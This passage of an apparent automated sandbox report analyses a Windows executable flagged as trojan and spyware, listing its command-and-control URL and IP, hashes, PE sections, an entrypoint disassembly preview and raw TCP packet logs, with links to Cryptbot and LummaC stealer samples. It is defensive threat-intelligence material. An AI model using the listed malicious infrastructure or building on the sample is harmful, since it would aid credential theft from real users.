                        https://curl.se/docs/http-cookies.html2M43DSi2cx.exe, 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          https://curl.se/docs/hsts.html#2M43DSi2cx.exefalse
                            		high
                            http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985142M43DSi2cx.exe, 00000000.00000002.1425461490.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000003.1414372045.00000000014B5000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv172M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpfalse
                                		high
                                https://curl.se/docs/http-cookies.html#2M43DSi2cx.exefalse
                                  		high
                                  https://curl.se/docs/alt-svc.html2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpfalse
                                    		high
                                    http://.css2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpfalse
                                      		high
                                      http://.jpg2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpfalse
                                        		high
                                        http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798514fd42M43DSi2cx.exe, 00000000.00000002.1425461490.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000003.1414372045.00000000014B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          185.121.15.192
                                          		home.fivetk5ht.topSpain
                                          		207046REDSERVICIOESfalse
                                          34.226.108.155
                                          		httpbin.orgUnited States
                                          		14618AMAZON-AESUSfalse

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1578929
                                          Start date and time:2024-12-20 16:43:36 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 4m 18s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:3
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:2M43DSi2cx.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:98f2f2f0d74571af72dd4ca43c1692bf.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:Failed
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Stop behavior analysis, all processes terminated

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63
                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          10:44:45API Interceptor3x Sleep call for process: 2M43DSi2cx.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          185.121.15.192HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                          • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                          t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                          • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                          16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                          • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                          hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                          • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                          pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                          • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                          CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                          • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                          5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                          • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                          u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                          • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                          TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                          • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                          • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=TmUWwkAQBKXXTWTE1734696758
                                          34.226.108.155f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                            1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                              16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                  pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                    5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                          file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                            s3hvuz3XS0.exeGet hashmaliciousCryptbotBrowse

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              httpbin.orgf9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                              • 34.226.108.155
                                                              u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                              • 98.85.100.80
                                                              1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                              • 34.226.108.155
                                                              HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                              • 98.85.100.80
                                                              t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                              • 98.85.100.80
                                                              16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                              • 34.226.108.155
                                                              hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                              • 34.226.108.155
                                                              pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                              • 34.226.108.155
                                                              CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                              • 98.85.100.80
                                                              5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                              • 34.226.108.155
                                                              home.fivetk5ht.topHZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                              • 185.121.15.192
                                                              t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                              • 185.121.15.192
                                                              hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                              • 185.121.15.192
                                                              pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                              • 185.121.15.192
                                                              CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                              • 185.121.15.192
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                              • 185.121.15.192
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                              • 185.121.15.192
                                                              s-part-0035.t-0009.t-msedge.netVajVW1leCd.exeGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.63
                                                              7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.63
                                                              m21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                                                              • 13.107.246.63
                                                              16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                              • 13.107.246.63
                                                              Qmg24kMXxU.exeGet hashmaliciousLummaC, StealcBrowse
                                                              • 13.107.246.63
                                                              f48jWpQ2F8.exeGet hashmaliciousLummaCBrowse
                                                              • 13.107.246.63
                                                              MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.63
                                                              RZnZbS97dD.exeGet hashmaliciousLummaCBrowse
                                                              • 13.107.246.63
                                                              Invoice Shipment.bat.exeGet hashmaliciousDarkCloudBrowse
                                                              • 13.107.246.63
                                                              MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.63

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              REDSERVICIOESHZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                              • 185.121.15.192
                                                              t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                              • 185.121.15.192
                                                              16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                              • 185.121.15.192
                                                              hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                              • 185.121.15.192
                                                              pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                              • 185.121.15.192
                                                              CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                              • 185.121.15.192
                                                              5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                              • 185.121.15.192
                                                              u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                              • 185.121.15.192
                                                              TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                              • 185.121.15.192
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                              • 185.121.15.192
                                                              AMAZON-AESUSf9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                              • 34.226.108.155
                                                              1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                              • 34.226.108.155
                                                              nshmpsl.elfGet hashmaliciousMiraiBrowse
                                                              • 52.206.106.77
                                                              DzbIZ1HRMj.zipGet hashmaliciousUnknownBrowse
                                                              • 52.0.145.89
                                                              16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                              • 34.226.108.155
                                                              hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                              • 34.226.108.155
                                                              pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                              • 34.226.108.155
                                                              securedoc_20241220T070409.htmlGet hashmaliciousUnknownBrowse
                                                              • 52.86.107.71
                                                              5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                              • 34.226.108.155
                                                              https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImJyaWFuLmh1dGNoaW5zQHJpdmVycm9jay5jb20iLCJyZXF1ZXN0SWQiOiJhYzIxMDNjZS03NDZkLTRmMTctNjBkYi00MzM5OWU3NzU5NGEiLCJsaW5rIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9pZC91cm46YWFpZDpzYzpWQTZDMjplOTgwMjRmZi03NGRmLTRlNjctYjJkZi0wNWY0NTk4MTc4OWUiLCJsYWJlbCI6IjExIiwibG9jYWxlIjoicHRfQlIifQ.GzFDC4sqpVLEAHwIPLSleF4_d0iUGb4--dg-spPTHWsUGjt086-aN6bs1cEm-BfvTqQu97RqT5NU-RFwvTkvTAGet hashmaliciousUnknownBrowse
                                                              • 3.236.206.93

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              No created / dropped files found

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                              Entropy (8bit):7.984374373130843
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • VXD Driver (31/22) 0.00%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:2M43DSi2cx.exe
                                                              File size:4'483'072 bytes
                                                              MD5:98f2f2f0d74571af72dd4ca43c1692bf
                                                              SHA1:507cac98014412c6e697ea75f3c1941bad57df48
                                                              SHA256:dfe46285484362af5dc63dd0bba5de89c1c1d7105f7e8d05b2514fa39ac3750a
                                                              SHA512:555b04fcb4fb1b49f35bd99bbcc9e40b85bec6fb604c71ce997a0027eb616248e0cd225de905c2d72b5e72763383438250a0063fefdf3323137e075b76cc63c5
                                                              SSDEEP:98304:RY3zmnEwBIPSoKp8c6tY11HZ28iC53RlCPCaRFX62szGgA5:RY3zrwBIPSogP3IjKRlCbfX6s
                                                              TLSH:672633EDA236DD52E4A002B6C2FE4B335EB490D1B6A14E583D35712BB0C3F513B5E626
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...`.......pH...@..................................TE...@... ............................

                                                              File Icon

                                                              Icon Hash:90cececece8e8eb0

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x1096000
                                                              Entrypoint Section:.taggant
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                              DLL Characteristics:DYNAMIC_BASE
                                                              Time Stamp:0x67639809 [Thu Dec 19 03:50:33 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp 00007F2BDC8D6EDAh
                                                              cmovbe eax, dword ptr [eax+eax+00h]
                                                              add byte ptr [eax], al
                                                              add cl, ch
                                                              add byte ptr [eax], ah
                                                              add byte ptr [eax], al
                                                              add byte ptr [esi], al
                                                              or al, byte ptr [eax]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], dh
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], ah
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              and dword ptr [eax], eax
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              push es
                                                              or al, byte ptr [eax]
                                                              add byte ptr [edx], cl
                                                              or al, byte ptr [eax]
                                                              add byte ptr [ecx], cl
                                                              or al, byte ptr [eax]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [ecx], al
                                                              add byte ptr [eax], 00000000h
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              adc byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add dword ptr [edx], ecx
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x74705f0x73.idata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x7460000x1ac.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc94e6c0x10zicceeoj
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0xc94e1c0x18zicceeoj
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              0x10000x7450000x284c0029eb8d0738190f365fcdff93b9690278unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x7460000x1ac0x200f73afcc49f62029d6a3aa1bbcbd6181fFalse0.583984375data4.523357056601817IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .idata 0x7470000x10000x200e84636d45557e74dadd0f14f36394655False0.166015625data1.1471680400846989IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              0x7480000x38f0000x200c8da4537e0a518e485bced0831b2539bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              zicceeoj0xad70000x1be0000x1be0001b5af0168e6a966e97998203a85789aeFalse0.9945489857763453data7.954541903209299IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              xmbctvay0xc950000x10000x40099824028c69b6db4186bf8cc453746d2False0.7373046875data5.922691116103226IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .taggant0xc960000x30000x2200fc1797c101fbd888be2777c143cda36fFalse0.06192555147058824DOS executable (COM)0.7460648166046044IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_MANIFEST0xc94e7c0x152ASCII text, with CRLF line terminators0.6479289940828402

                                                              Imports

                                                              DLLImport
                                                              kernel32.dlllstrcpy

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 20, 2024 16:44:40.720305920 CET49713443192.168.2.1034.226.108.155
                                                              Dec 20, 2024 16:44:40.720356941 CET4434971334.226.108.155192.168.2.10
                                                              Dec 20, 2024 16:44:40.720570087 CET49713443192.168.2.1034.226.108.155
                                                              Dec 20, 2024 16:44:40.737739086 CET49713443192.168.2.1034.226.108.155
                                                              Dec 20, 2024 16:44:40.737759113 CET4434971334.226.108.155192.168.2.10
                                                              Dec 20, 2024 16:44:42.491576910 CET4434971334.226.108.155192.168.2.10
                                                              Dec 20, 2024 16:44:42.492161989 CET49713443192.168.2.1034.226.108.155
                                                              Dec 20, 2024 16:44:42.492189884 CET4434971334.226.108.155192.168.2.10
                                                              Dec 20, 2024 16:44:42.493609905 CET4434971334.226.108.155192.168.2.10
                                                              Dec 20, 2024 16:44:42.493690014 CET49713443192.168.2.1034.226.108.155
                                                              Dec 20, 2024 16:44:42.495218992 CET49713443192.168.2.1034.226.108.155
                                                              Dec 20, 2024 16:44:42.495292902 CET4434971334.226.108.155192.168.2.10
                                                              Dec 20, 2024 16:44:42.509179115 CET49713443192.168.2.1034.226.108.155
                                                              Dec 20, 2024 16:44:42.509193897 CET4434971334.226.108.155192.168.2.10
                                                              Dec 20, 2024 16:44:42.560158968 CET49713443192.168.2.1034.226.108.155
                                                              Dec 20, 2024 16:44:42.829164982 CET4434971334.226.108.155192.168.2.10
                                                              Dec 20, 2024 16:44:42.829277992 CET4434971334.226.108.155192.168.2.10
                                                              Dec 20, 2024 16:44:42.829355001 CET49713443192.168.2.1034.226.108.155
                                                              Dec 20, 2024 16:44:42.846642971 CET49713443192.168.2.1034.226.108.155
                                                              Dec 20, 2024 16:44:42.846668005 CET4434971334.226.108.155192.168.2.10
                                                              Dec 20, 2024 16:44:44.244117975 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.364921093 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.365024090 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.366157055 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.485989094 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.486027956 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.486063957 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.486107111 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.486443043 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.486502886 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.486732960 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.486761093 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.486782074 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.486788988 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.486810923 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.486815929 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.486836910 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.486843109 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.486865044 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.486870050 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.486890078 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.486896992 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.486938000 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.605748892 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.605762959 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.605772972 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.605994940 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.605995893 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.606012106 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.606064081 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.606076002 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.606096983 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.606148958 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.654866934 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.658267021 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.765845060 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.765927076 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:44.821964979 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.930145025 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:44.932334900 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.134601116 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.134727001 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.351752996 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.352067947 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.352258921 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.472013950 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472034931 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472050905 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472115040 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.472157001 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472171068 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472186089 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472203016 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472219944 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472271919 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.472318888 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472335100 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472364902 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.472388983 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.472405910 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472420931 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472449064 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.472465038 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.472486019 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472501993 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472527027 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.472549915 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.472734928 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472748995 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472793102 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.472825050 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472841024 CET8049724185.121.15.192192.168.2.10
